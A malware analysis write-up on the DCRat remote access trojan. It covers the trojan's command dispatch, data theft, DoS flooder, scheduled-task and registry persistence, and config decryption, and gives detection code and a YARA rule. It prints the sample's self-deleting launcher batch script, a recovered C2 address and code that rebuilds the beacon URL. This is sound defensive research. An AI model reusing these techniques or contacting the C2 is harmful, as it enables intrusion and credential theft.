A deep dive into DCRAT/DarkCrystalRAT malware


In the name of God, the Most Gracious, the Most Merciful

FreePalestine

Introduction

Dark Crystal RAT (DCRat) is a .NET remote access trojan that has been around since at least June 2019. It offers the usual RAT feature set: power options (shutdown, reboot, log off), enumeration (processes, folders, drives, screens, microphones, cameras), in-memory compilation and execution of C#/VB code and of VBS, PowerShell and batch scripts, collection of Steam, Telegram and Discord data, persistence, and a simple denial-of-service (DoS) flooder. This post walks through each capability as seen in the decompiled sample.

Technical summary

| Action | Description |
|---|---|
| Power options | Reboot or shut down the system and log off the current user. |
| Enumerate operations | Enumerate processes (including executable paths), folders, drives, screens, microphones and cameras. |
| Clipboard grabber | Retrieve files or text from the clipboard. |
| Execute CS, VB, VBS, PS | Compile and run C# or VB code in memory and run batch, VBS or PowerShell scripts on the victim's machine. |
| Denial of Service (DoS) | Flood a target with HTTP POST, UDP and TCP traffic from the victim's computer. |
| Take screenshots | Capture the victim's screen and report the screen width and height. |
| Steal Steam credentials | Read Steam registry values and loginusers.vdf to collect Steam account data. |
| Retrieve Telegram and Discord paths | Locate the Telegram installation path and Discord's local database files. |
| System info | Collect the victim's public IP address, hostname, country, machine name, user name, Windows version and more. |
| Persistence | Scheduled tasks plus the Run and Winlogon Shell registry values. |

Commands

The malware receives commands from the C2 and dispatches them to the corresponding malicious functions inside the Class30 class, specifically in the C7y method.

Figure: Commands and malicious functions


The dispatcher takes struct7_0 as input; it holds the command and its data, which come from the dictionary2 dictionary. The RL4 method returns the command string from dictionary2. That string is hashed with SHA-256, the first 4 bytes (32 bits) of the digest are read as a little-endian unsigned integer, and the result is reduced modulo 1,000,000 to a six-digit number that is compared against the hard-coded values of the command table. This is done by the w_compute_SHA256_return_6_digits method (a renamed obfuscated method).

Figure: w_compute_SHA256_return_6_digits method


A Python reimplementation of that method:

import hashlib
import struct

def smethod_1(string_0):
    """Reimplementation of w_compute_SHA256_return_6_digits."""
    digest = hashlib.sha256(string_0.encode('utf-8')).digest()

    # First 4 bytes (32 bits) of the digest as a little-endian uint32
    hash_value = struct.unpack('<I', digest[:4])[0]

    # Reduce to a six-digit number by taking modulo 1,000,000
    return hash_value % 1000000

input_string = "command"
print("Hash: {:06d}".format(smethod_1(input_string)))

Power options

Inside the ba1 method, the malware starts a process that reboots the victim's machine immediately: shutdown.exe /r /f /t 0 (/f forces running applications to close, /t 0 sets no delay).

Figure: reboot the system immediately


Inside the Class25 method, it logs the current user off the same way: shutdown.exe /l /f /t 0.

Figure: logoff the system immediately


And it can shut the victim's machine down.

Figure: Shutdown the system immediately


Enumerate operations

Enumerate Processes and their executable

Inside the avS method, the malware enumerates the running processes and retrieves the full path of each process's executable. It fills a dictionary with the following keys:

| Key | Value |
|---|---|
| N | Name of the executable associated with the process (ProcessName + ".exe"). |
| T | Window title of the process (WindowTitle + " "). |
| I | Process ID (processId + " "). |
| S | 1 when the process ID equals the ID of the current process, i.e. the malware itself. |
| P | Full path of the process's executable, obtained with QueryFullProcessImageName; "Memory" is used as a placeholder when the lookup fails. |

Figure: Enumerate Processes and retrieve thier associated executable


Enumerate Drives

Inside the W1W method, the malware retrieves information about the drives of the victim's computer, such as type, name, size and description.

It fills a dictionary with:

| Key | Value |
|---|---|
| T | "Drive" |
| N | Drive name |
| S | Size of the drive |
| M | Description of the drive: volume label, drive type and drive format |

Figure: Enumerate Drives


Enumerate folders

Inside the CmN method, the malware lists the files and directories inside a given directory and returns the result in a structured form. For a directory:

| Key | Value |
|---|---|
| T | "Folder" |
| N | Name of the directory |
| S | Empty string "" |
| M | Last modified time of the directory, formatted dd.MM.yyyy HH:mm |

For a file:

| Key | Value |
|---|---|
| T | "File" |
| N | Name of the file |
| S | Size of the file |
| M | Last modified time of the file, formatted dd.MM.yyyy HH:mm |

Figure: Enumerate folders or files


Enumerate screens

The malware enumerates the available screens and returns their number and device names.

Figure: Enumerate screens


Enumerate Cameras

The code will retrieve info about the camera devices on the system.

Figure: Enumerate cameras


Enumerate Microphones

The malware will retrieve info about the audio input devices using the Windows Multimedia API (winmm.dll) and return a list of audio input device names.

Figure: Enumerate Microphones


Clipboard grabber

The malware grabs data from the clipboard.

Figure: grab data from Clipboard


Inside the GetText method, the malware retrieves text from the clipboard in a given format (UnicodeText, Text or HTML) through Clipboard.GetDataObject(), which returns the current clipboard contents.

Figure: How to grab data from Clipboard


To save the contents, it first checks Clipboard.ContainsFileDropList(): a file drop list is written to Clipboard [Files].txt, otherwise text is written to Clipboard [Text].txt.

Figure: Save Clipboard data


Show notifications

Inside atR method, the malware can show notifications on the victim’s computer such as information, warning, confirmation, or error.

Figure: Show Message box with a text


Execute CS, VB, VBS, PS

The malware can compile and run C# or Visual Basic source code, and run VBS, PowerShell and batch scripts, on the victim's machine.

First it checks the Type field to decide how the payload is executed. If the type is C# or VB:

  1. For C# it creates a CSharpCodeProvider, for VB a VBCodeProvider; both are CodeDom providers that compile source code at run time.
  2. Before compiling, it configures CompilerParameters: GenerateInMemory is set to true and GenerateExecutable to false, so the output is a class library loaded into the current process rather than an executable written to disk.
  3. It compiles the supplied source with CompileAssemblyFromSource. If there are compilation errors, it collects the error number, line and error text.
  4. If there are no errors, it instantiates the class DCRAT.code from the new assembly and invokes its Main method, executing the operator's code dynamically.

A practitioner's caveat: on the .NET Framework the CodeDom providers spawn csc.exe or vbc.exe from the framework directory to do the actual compilation, so "in memory" only describes the output assembly. The compiler child process and its temporary source and response files under %TEMP% are visible to process-creation and file telemetry.

Figure: Check if the type is CS or VB


Figure: Check if errors happen then execute


If the type is BAT, the malware writes the code from dictionary["Code"] into a file with a randomly generated name in the temp directory and runs it in one of two ways, chosen by the value of dictionary2["Hidden"]:

  1. If dictionary2["Hidden"] is true, the batch file runs without a visible command-line window.
  2. If dictionary2["Hidden"] is false, the batch file runs with the command-line window shown.

After execution the batch file is deleted.

Figure: How it runs the bat script


If it is a VBS script, the code is written to a file and run with cscript.exe, the console Windows Script Host. The script file is deleted afterwards.

Figure: How it runs the VBS script


If it’s a powershell PS script, the code will run the PS script in a hidden window using powershell.exe.

Figure: How it runs the PS script


Take screenshots

Inside the uKl method, the malware takes screenshots of the victim's screen and records the screen width and height.

Figure: uKl method


It starts a thread that captures the screen repeatedly, encodes each capture as a JPEG byte array and uploads the files to the C2.

Figure: Capture screenshots


Download File

Inside the Class19 method, the malware downloads a file from a given URL and saves it to a given directory on the victim's machine.

Figure: Download file


Run a specific file

Inside the Class32 method, the malware runs a file on the victim's machine by starting a process with a chosen window style: Hidden, Minimized or Maximized.

Figure: Run the downloaded file


Write bat file in temp

The malware writes a .bat file with a randomly generated name in the temp path, with the following content (the user name and the random file name vary per run):

@echo off
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2  1>nul
start "" "C:\Users\username\Start Menu\SearchProtocolHost.exe"
del /a /q /f "C:\Users\username\AppData\Local\Temp\\sr3bn8JpP4.bat"

  • @echo off: stops the commands from being echoed to the console window while they run.

  • w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul: a delay. w32tm (the Windows Time service client) samples the clock of /computer:localhost twice (/samples:2) five seconds apart (/period:5), printing only the data values (/dataonly), and 1>nul discards the output. Since the command takes about five seconds to complete, it works as a sleep without ping or timeout.

  • start "" "C:\Users\username\Start Menu\SearchProtocolHost.exe": launches SearchProtocolHost.exe from the user's Start Menu folder (the empty string is the window title argument of start). This is not the legitimate SearchProtocolHost.exe from System32, which makes the path a useful hunting point.

  • del /a /q /f "C:\Users\username\AppData\Local\Temp\\sr3bn8JpP4.bat": deletes the batch file itself.

After writing the script, the batch file is launched in a new process (with administrator privileges).

Figure: batch script


Download and execute

In this method, the malware downloads an executable into the temp folder and runs it through a batch file: the batch file starts the downloaded file (text) in a new process and then deletes itself.

Figure: Download an exe file and execute it


Denial of Service DoS

The malware can run a denial-of-service (DoS) attack from the victim's computer. It starts several threads, described next.

Figure: Prepare threads to send a file


First, the malware starts a thread running the HF6 method, which opens a TCP connection to the target host or IP address, sends a simple HTTP POST request to it and then sleeps for 100 milliseconds.

Figure: First thread to prepare the connection


Then it launches a thread running the method_0 method, which creates a socket and sends UDP packets to the remote host with SendTo. The size of each packet is w_Generate_random_numbers() % 1000 + 1, i.e. between 1 and 1000 bytes, and the thread sleeps for 100 milliseconds between packets.

Figure: setting up a Socket for UDP flood attack


The third thread does the same, but sends TCP packets to the remote host instead of UDP packets.

Figure: setting up a Socket for sending TCP packets


Steal Steam credentials

| Action | How |
|---|---|
| Get Steam path | Read the SteamPath value under the SOFTWARE\Valve\Steam registry key. |
| Language | Read the Language value under the SOFTWARE\Valve\Steam registry key. |
| Login users | Read the AutoLoginUser value under the SOFTWARE\Valve\Steam registry key. |
| Steam IDs | Parse the loginusers.vdf file to obtain the Steam user IDs. |
| Steam apps | Retrieve the list of game names installed on the Steam platform. |

Figure: Return Steam users


Figure: Return Steam IDs


Get Telegram path

The malware tries to find the Telegram installation path in two ways: by matching paths against the regular expression (\w\W.+)Telegram.exe, or by looking for processes with Telegram-related names such as Telegram and Kotatogram and reading their executable path with the renamed w_QueryFullProcessImageName helper (a wrapper around QueryFullProcessImageName).

Figure: Get Telegram path


Get Discord path

This code determines the path of Discord's local database files.

Figure: Get Discord path


System info

Inside the o4V method, the malware Base64-decodes aHR0cHM6Ly9pcGluZm8uaW8vanNvbg==, which is https://ipinfo.io/json, and queries it to learn the victim's public IP address, hostname, country and more. On its own, traffic to ipinfo.io is a weak indicator because plenty of legitimate software uses it; it is only meaningful together with the other behaviours described here.

Figure: Retrieve info such as IP or the location


Then, inside the method_1 method, the malware collects additional information such as PCName, UserName, WindowsVersion, ACTiveWindow and more.

Figure: Retrieve additional info


The collected information is written to a .txt file and sent to the C2.

Persistence

The malware tries to survive reboots and stay unnoticed while carrying out its activities. It uses two persistence methods: scheduled tasks and registry modification.

  1. Scheduled tasks, created by running schtasks.exe:
    • The first command creates a task that runs our sample every minute, with a random delay between 5 and 15 seconds.
    • The second command creates the same task but triggered at user logon, with the run level set to HIGHEST.

Figure: Create scheduled tasks for persistence


The malware can also remove the scheduled tasks it created.

Figure: Delete scheduled tasks


  2. Registry modification:
    • It opens Software\Microsoft\Windows\CurrentVersion\Run and adds a value named after the sample (without extension) whose data is the sample's full path ("path/to/sample/fullsamplename").
    • It opens Software\Microsoft\Windows NT\CurrentVersion\Winlogon, reads the Shell value and appends the sample's full path to it. The Shell value names the program Windows starts as the user's shell at logon (normally explorer.exe), so the sample is started alongside the shell.

Figure: modify registries


Here the malware removes the registry values it added earlier.

Figure: Delete registries
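The scheduled-task and registry persistence above, and the w32tm batch launcher from the "Write bat file in temp" section, leave a recognisable trail in process-creation and registry telemetry. The following Python is an added example (not code from the post or from the sample) that scans constructed Sysmon-style events (event 1 = process create, event 13 = registry value set; the user name, task names, paths and file names are made up) for the patterns described: a schtasks task firing every minute, or at logon with run level HIGHEST, whose action points into a user-writable path; a Run value pointing into a user-writable path; a Winlogon Shell value that is no longer just explorer.exe; and cmd.exe running a .bat from %TEMP% that uses w32tm /stripchart as a delay before a start command.

```python
import re

# Paths a standard user can write to; a persistence entry pointing here is worth a look.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Start Menu|Downloads|Desktop)\\", re.IGNORECASE)

# schtasks switches: /name or /name value, where the value may be quoted
SWITCH = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^/\s]\S*))?')

# Constructed sample events, not real telemetry
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /tn "Updater" /tr "C:\Users\alice\AppData\Roaming\svc.exe" /sc minute /mo 1 /f'},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /tn "UpdaterLogon" /tr "C:\Users\alice\AppData\Roaming\svc.exe" /sc onlogon /rl highest /f'},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /tn "Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\svc",
     "details": r"C:\Users\alice\AppData\Roaming\svc.exe"},
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "details": r"explorer.exe, C:\Users\alice\AppData\Roaming\svc.exe"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd /c "C:\Users\alice\AppData\Local\Temp\sr3bn8JpP4.bat"',
     # Content of the batch file, as the post shows it (user name and file name made up)
     "script": "\n".join([
         "@echo off",
         "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2  1>nul",
         r'start "" "C:\Users\alice\Start Menu\SearchProtocolHost.exe"',
         r'del /a /q /f "C:\Users\alice\AppData\Local\Temp\sr3bn8JpP4.bat"',
     ])},
]


def parse_schtasks(cmdline):
    """Return {switch: value} for a schtasks command line (switches lower-cased, values unquoted)."""
    return {name.lower(): value.strip('"') for name, value in SWITCH.findall(cmdline)}


def check_schtasks(event):
    opts = parse_schtasks(event["cmd"])
    if "create" not in opts or not USER_WRITABLE.search(opts.get("tr", "")):
        return []
    sc, rl = opts.get("sc", "").lower(), opts.get("rl", "").lower()
    findings = []
    if sc == "minute":
        findings.append(("schtasks_minute_user_path", opts["tr"]))
    if sc == "onlogon" and rl == "highest":
        findings.append(("schtasks_onlogon_highest_user_path", opts["tr"]))
    return findings


def check_registry(event):
    target, data = event["target"], event["details"]
    if re.search(r"\\CurrentVersion\\Run\\[^\\]+$", target, re.I) and USER_WRITABLE.search(data):
        return [("run_key_user_path", data)]
    # Anything beyond the default explorer.exe means another program starts with the shell
    if target.lower().endswith(r"\winlogon\shell") and data.strip().lower() != "explorer.exe":
        return [("winlogon_shell_modified", data)]
    return []


def check_batch(event):
    """cmd.exe running a .bat from %TEMP% that sleeps via w32tm /stripchart and then starts a binary."""
    if not re.search(r'\\Temp\\[^"]+\.bat', event["cmd"], re.I):
        return []
    script = event.get("script", "")
    if "w32tm /stripchart" in script and re.search(r"^start\s", script, re.M):
        return [("w32tm_sleep_batch", event["cmd"])]
    return []


def scan(events):
    """Run every check over the event list and return (rule, detail) findings."""
    findings = []
    for ev in events:
        if ev["id"] == 13:
            findings += check_registry(ev)
        elif ev["id"] == 1 and ev["image"].lower().endswith("schtasks.exe"):
            findings += check_schtasks(ev)
        elif ev["id"] == 1 and ev["image"].lower().endswith("cmd.exe"):
            findings += check_batch(ev)
    return findings


if __name__ == "__main__":
    for rule, detail in scan(EVENTS):
        print(f"{rule}: {detail}")
```

The daily backup task in the sample events is deliberately not flagged: the action lives under Program Files, so the user-writable-path filter is what keeps the rule from firing on ordinary administrative tasks.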


Configuration decryption

In the next figure we see the config_dec method, which holds a Base64 string beginning with H4sIAA. That prefix is the Base64 encoding of the gzip magic bytes 1f 8b 08, so the blob is gzip-compressed data that was then Base64-encoded.

Figure: encoded string starts with zipped string


Following the embee-research blog, the decoding goes as follows: Base64-decode the string, decompress (gunzip) the result, reverse the characters, and Base64-decode again, then unescape the string to remove the backslashes that escape the JSON. In CyberChef, paste the encoded string into the input and use the recipe:

From Base64 → Gunzip → Reverse → From Base64 → Unescape string (to clean the string of the \ characters).

Figure: decoded configuration from config_dec


From the decoded configuration we learn that:

  • The SCRT and PCRT dictionaries are substitution tables used to decode further strings, as shown below for the C2 configuration.

  • Mutex: qrXivo3mkbeXpHSqt4kC

  • Enabled features (stealer modules and collection options):

 cookies
 passwords
 forms
 cc
 history
 telegram
 steam
 discord
 filezilla
 screenshot
 clipboard
 sysinfo
 searchpath:"%UsersFolder% - Fast
 AS


Scrolling down, we find a second Base64 string with the same H4sIAA prefix, in the c2_config method.
The malware Base64-decodes and gunzips it, then takes the ["SCRT"] dictionary from the already decoded config_dec output and replaces every occurrence of a dictionary value in the decompressed string with the corresponding key. It then reverses the characters and Base64-decodes the result a second time.

Figure: encoded configuration from c2_config


Inside the w_replace_values method we can see exactly that: each value of the decompressed c2_config string is swapped for its ["SCRT"] key (value to key, not the other way around).

Figure: Replacing values with keys c2_config inside w_replace_values


The following script reproduces the decoding and recovers the C2:

import base64
import gzip

# SCRT/PCRT dictionaries obtained from the config_dec decoding above
A1 = {"SCRT":{"Q":")","a":"_","m":"(","I":"^","M":"`","j":"$","v":"#","Y":" ","h":"@","8":"!","4":"|","s":"&","D":"~","1":"*","P":".","N":"<","W":"-","y":">","U":",","3":";","2":"%"},"PCRT":{"0":"%","I":")","G":",","T":"&","y":";","R":"~","l":"(","j":"@","X":"-","p":"`","x":"_","S":".","d":">","U":"|","e":" ","w":"#","b":"!","Y":"$","=":"*","9":"^","M":"<"}}

# Encoded string from c2_config
zip_encoded = "H4sIAAAAAAAEABXMwQqCMBgA4FdRUpnixIuBuGQrNJGBkOKhw6/YOoykvIyNCJ89PX6X7xS/QYNspD+DB5e+MlgMdO48gqbBuJZ37wWlM97dUGSdgy5iaTsmv5zowuGu74zq8SUHWzb6VolPvV2wtlJLCEUxBUuJm+1RSzk5BvVBecX7q5JikGUYpSzm5uXwjHWjslaSb29m5/zIKhFTBEdoR6jz5x/oSq6sqAAAAA=="
unzip_decoded = gzip.decompress(base64.b64decode(zip_encoded)).decode("utf-8")
# print(unzip_decoded)

# Substitute every SCRT value (a punctuation character) with its key (a Base64 alphabet
# character). All values are single symbols and all keys are alphanumerics, so a one-pass
# translation gives the same result as the malware's sequential replace.
table = str.maketrans({value: key for key, value in A1["SCRT"].items()})
unzip_decoded = unzip_decoded.translate(table)
# print("First round of decoding:\n" + unzip_decoded + "\n")

# Reverse the string, then Base64-decode again
reverse_unzip_decoded = unzip_decoded[::-1]
decoded = base64.b64decode(reverse_unzip_decoded)
print("Second round of decoding:\n" + decoded.decode("utf-8", "replace"))

The output is: {"H1":"http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT","H2":"http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT","T":"0"}

After decoding the C2 configuration, the malware draws a random number between 100 and 10000 and pauses the thread for that randomly generated amount of time.

C2 communications

After resuming the thread, the malware checks whether T in the C2 config is 1; in our sample it is 0. When T is 1, the malware uses WebClient for its HTTP requests, with a custom User-Agent header and a specific MIME type set on the request.

Figure: WebClient to make HTTP requests


Inside the sAA method

Figure: sAA method


First, the malware generates a random string made of two parts, each between 2 and 32 characters long, joined with =. It stores the result in the text variable for later use.

Figure: Generate random text


Then we enter the for loop. method_0 and method_1 return H1 and H2 from the decoded config, which in this sample are the same entry: "http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT". The request URL is assembled as follows:

  1. text2 holds the C2 entry "http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT".
  2. It is split on @; text3 holds "http://77[.]246[.]107[.]91/".
  3. The part after @, ==AbhNnclZXauVlclZnclNXZulGT, is reversed and then Base64-decoded, which gives LineserverUniversal; text4 holds that name.
  4. MD5 of 77.246.107.91gettoken.
  5. MD5 of 77.246.107.91.
  6. MD5 of 77.246.107.91token_uid.
  7. The value of zl3.x83 is computed from these inputs: the d51 method receives the mutex from ["MUTEX"], "DCR_MUTEX-qrXivo3mkbeXpHSqt4kC"; var_version_number holds the version 4.5.33; the D9a method gathers the OS, the system directory, MachineName, the user name, the process count, the OS type, the current user's profile path and the total size of the drives, and hashes the result with SHA-1; Get_MachineName returns the machine name (for example FOLAN-PC) and Get_UserName the user name (for example folan); the mutex string "DCR_MUTEX-qrXivo3mkbeXpHSqt4kC" is also hashed with SHA-1.
  8. The resulting zl3.x83 value is then transformed with SHA-1, SHA-1 again, Base64 (with the trailing = removed) and a character reversal. As a check: reversing the sample value in the URL below and Base64-decoding it yields a 40-character hexadecimal string, exactly the hex form of a SHA-1 digest.

After these operations, the URL request will be like this:
http://77[.]246[.]107[.]91/LineserverUniversal[.]php?S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR&bac6c8eb8980430e52de074e8ac708b2=d150a0b3e170c11c5606292418404eed&66aba1f0bc95f01c05b9d5c9b7ca2004=AMkVWZ0QTZjRzN5IWZ0YjN5IDOihDNwATY3kTMzMWO1MWN2M2NxEzY&S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR

  1. text3: http://77[.]246[.]107[.]91/
  2. text4: LineserverUniversal + .php?
  3. text: S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR + &
  4. MD5 hash of 77.246.107.91gettoken : bac6c8eb8980430e52de074e8ac708b2 + =
  5. MD5 hash of 77.246.107.91: d150a0b3e170c11c5606292418404eed + &
  6. MD5 hash of 77.246.107.91token_uid = 66aba1f0bc95f01c05b9d5c9b7ca2004 + =
  7. The value of zl3.x83: AMkVWZ0QTZjRzN5IWZ0YjN5IDOihDNwATY3kTMzMWO1MWN2M2NxEzY + &
  8. text: S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR
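To make the URL construction above concrete, here is an added Python example (not the post's or the sample's code) that parses the recovered C2 entry, decodes the endpoint tag, builds the query string in the order listed, and encodes and decodes the zl3.x83 token (SHA-1 hex digest, Base64, trailing = stripped, reversed). The SHA-1 input for the token is a constructed placeholder, because the exact concatenation the sample hashes is not reproduced here; the host is refanged only to compute the MD5 values, and nothing is sent anywhere.

```python
import base64
import hashlib
import secrets
import string

# C2 entry exactly as recovered from the c2_config blob (kept defanged; H1 and H2 are identical)
C2_ENTRY = "http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT"
# The zl3.x83 value from the sample request URL
SAMPLE_TOKEN = "AMkVWZ0QTZjRzN5IWZ0YjN5IDOihDNwATY3kTMzMWO1MWN2M2NxEzY"


def reverse_b64_decode(s: str) -> str:
    """Reverse the string, restore '=' padding, Base64-decode. Used for the endpoint tag and the token."""
    r = s[::-1]
    r += "=" * (-len(r) % 4)
    return base64.b64decode(r).decode("ascii")


def parse_c2_entry(entry: str):
    """'base@tag' -> (base URL, bare host, endpoint name). The host is refanged only so it can be hashed."""
    base, tag = entry.split("@", 1)
    host = base.split("//", 1)[1].rstrip("/").replace("[.]", ".")
    return base, host, reverse_b64_decode(tag)


def encode_token(sha1_hex: str) -> str:
    """Hex digest -> Base64 -> strip '=' -> reverse, the final steps the post describes for zl3.x83."""
    return base64.b64encode(sha1_hex.encode("ascii")).decode("ascii").rstrip("=")[::-1]


def decode_token(token: str) -> str:
    return reverse_b64_decode(token)


def random_text() -> str:
    """Two random alphanumeric parts of 2..32 characters joined by '=' (the 'text' query element)."""
    alphabet = string.ascii_letters + string.digits

    def part():
        return "".join(secrets.choice(alphabet) for _ in range(2 + secrets.randbelow(31)))

    return part() + "=" + part()


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("ascii")).hexdigest()


def build_beacon_url(entry: str, fingerprint_sha1_hex: str, text: str) -> str:
    """Assemble the URL in the post's order: text, md5(host+gettoken)=md5(host), md5(host+token_uid)=token, text."""
    base, host, endpoint = parse_c2_entry(entry)
    query = "&".join([
        text,
        md5_hex(host + "gettoken") + "=" + md5_hex(host),
        md5_hex(host + "token_uid") + "=" + encode_token(fingerprint_sha1_hex),
        text,
    ])
    return f"{base}{endpoint}.php?{query}"


if __name__ == "__main__":
    # Placeholder fingerprint: the real input (D9a output, mutex, machine and user name) is not reproduced here
    fingerprint = hashlib.sha1(b"constructed-fingerprint").hexdigest()
    print(parse_c2_entry(C2_ENTRY))
    print(decode_token(SAMPLE_TOKEN))
    print(build_beacon_url(C2_ENTRY, fingerprint, random_text()))
```

The token decode is a handy triage check: if a captured beacon's third query value reverses and Base64-decodes to 40 hex characters, it is the SHA-1-based field described above, which distinguishes this format from the random text and the MD5 parameter names around it.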

Commands table

The hash column holds the six-digit values produced by the routine described in the Commands section; the decompiled code carries them as uint literals (for example 489540U).

| Hash | Action |
|---|---|
| 489540, 214916 | Take screenshot, mouse events, keyboard events |
| 18691 | Create a zip of a directory |
| 134266 | Reboot the system |
| 281864 | Shut down the system |
| 334551 | Log off the current user |
| 379238 | Enumerate processes and their executables |
| 414986, 12926 | Download file |
| 526922 | Run a process |
| 549717 | Enumerate drives |
| 677710 | Run shell command |
| 750724 | Delete all files from the PC |
| 859704 | Uninstall the malware |
| 872468 | Show a MessageBox window |
| 909989 | Create a new directory |
| 911819 | Retrieve file or process properties |
| 950881 | Retrieve info about a specific folder |
| 38889 | Clipboard grabber |
| 44265 | Download and execute file |
| 160478 | Send UDP and TCP packets to a given IP (DDoS) |
| 154753 | Download and execute cs, vb, vbs, ps, bat |
| 788583 | Put text in the clipboard |
| 119627 | Open a URL |
| 172941, 343584 | Kill a process |
| 204675 | Show files of a directory |
| 225809 | Create a suspended notepad.exe process |
| 299365 | Run file |
| 322482 | Resume threads |
| 940389 | Suspend threads |
| 516557 | Delete directory |
| 739465 | Copy directory |
| 290226 | Move a file |
| 687473 | Extract a zip file |
| 163489 | Upload file to C2 |
| 922147 | Send collected info, plugins, clipboard data |
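The hashes in this table are one-way, so the plaintext command names can only be recovered by hashing candidate strings and comparing. The following Python is an added example (not code from the post or from the sample) that implements the SHA-256, first-four-bytes, modulo 1,000,000 routine from the Commands section and resolves a list of table hashes against a candidate wordlist, keeping every candidate that lands on the same value since the six-digit space makes collisions possible. The candidate words are guesses made up for illustration; the only known-good values in the test are the hashes of the empty string and "abc", derived from their public SHA-256 digests.

```python
import hashlib
import struct

MODULUS = 1_000_000


def dcrat_hash(command: str) -> int:
    """SHA-256, first 4 bytes as a little-endian uint32, mod 1,000,000 (the w_compute_SHA256_return_6_digits scheme)."""
    digest = hashlib.sha256(command.encode("utf-8")).digest()
    return struct.unpack("<I", digest[:4])[0] % MODULUS


def build_lookup(candidates):
    """Precompute hash -> [candidates]; several words can share one six-digit value."""
    table = {}
    for word in candidates:
        table.setdefault(dcrat_hash(word), []).append(word)
    return table


def resolve(hashes, candidates):
    """Map every table hash to the candidates that produce it (empty list when nothing matches)."""
    lookup = build_lookup(candidates)
    return {h: lookup.get(h, []) for h in hashes}


# Constructed candidate list: guesses, not names recovered from the sample
CANDIDATES = ["", "abc", "screenshot", "reboot", "shutdown", "logoff", "processes",
              "download", "clipboard", "uninstall", "drives", "shell", "messagebox"]

# A few hash values from the command table above
TABLE_HASHES = [489540, 214916, 134266, 281864, 334551, 379238, 859704, 38889, 549717]

if __name__ == "__main__":
    for h, names in resolve(TABLE_HASHES, CANDIDATES).items():
        print(f"{h:06d} -> {names or 'unresolved'}")
```

With a realistic wordlist (command names harvested from other DCRat builds or from the operator panel) the same loop turns the table into readable command names; any hash that stays unresolved simply has no candidate in the list yet.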

Yara

rule DCRat {
    meta:
        author = "Muhammad Hasan Ali @muha2xmad"
        date = "2023-09-03"
        description = "YARA rule for DCRat indicators"
    strings:
        $str001 = "cao28Fn172GnuaZvuO_OnSystemInfoO29PluginI2bG7" fullword wide
        $str002 = "uploadsafefile_name" fullword wide
        $str003 = "uploadfile_name" fullword wide
        $str004 = "searchpath" fullword wide
        $str005 = "runas" fullword wide
        $str006 = "@@EXTRACTLOCATION" fullword wide
        $str007 = "@@EXTRACT_EXISTING_FILE" fullword wide
        $str008 = "@@POST_UNPACK_CMD_LINE" fullword wide
        $str009 = "@@REMOVE_AFTER_EXECUTE" fullword wide
        $str010 = "ACTWindow" fullword wide
        $str011 = "Clipboard [Files].txt" fullword wide
        $str012 = "Clipboard [Text].txt" fullword wide
        $str013 = "ConfigPluginName" fullword wide
        $str014 = "saving...." fullword wide
        $str015 = "DCRat-Log#" fullword wide
        $str016 = "DCRat.Code" fullword wide
        $str017 = "EncTable" fullword wide
        $str018 = "OldPath" fullword wide
        $str019 = "[Clipboard] Saving information..." fullword wide
        $str020 = "[Plugin] Invoke:" fullword wide
        $str021 = "[Screenshot] Saving screenshots from" fullword wide
        // The misspelling is the malware's own string; do not "fix" it
        $str022 = "[SystemInfromation] Saving information..." fullword wide
        $str023 = "stealerlogstatus" fullword wide

        $API01 = "UseShellExecute" fullword ascii wide
        $API02 = "FromBase64String" fullword ascii wide
        $API03 = "GZipStream" fullword ascii wide
        $API04 = "GetTempPath" fullword ascii wide
        $API05 = "SHA1Managed" fullword ascii wide
        $API06 = "SHA256Managed" fullword ascii wide

        $dir1 = "%AppData% - Very Fast\\AppData\\" fullword wide
        $dir2 = "%SystemDrive% - Slow" fullword wide
        $dir3 = "%UsersFolder% - Fast" fullword wide

        $ext01 = ".bat" fullword wide
        $ext02 = ".vbs" fullword wide
        $ext03 = ".zip" fullword wide
        $ext04 = ".jpg" fullword wide
        $ext05 = ".exe" fullword wide

        $comm = "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2  1>nul" fullword wide

    condition:
        uint16(0) == 0x5a4d and 15 of ($str*) and 5 of ($API*) and 2 of ($dir*) and 3 of ($ext*) and $comm
}

IoCs

Quote

Your eyes are no longer a refuge, and we are no longer the refugees.

Completed, with praise and thanks to God and by His grace.

Ref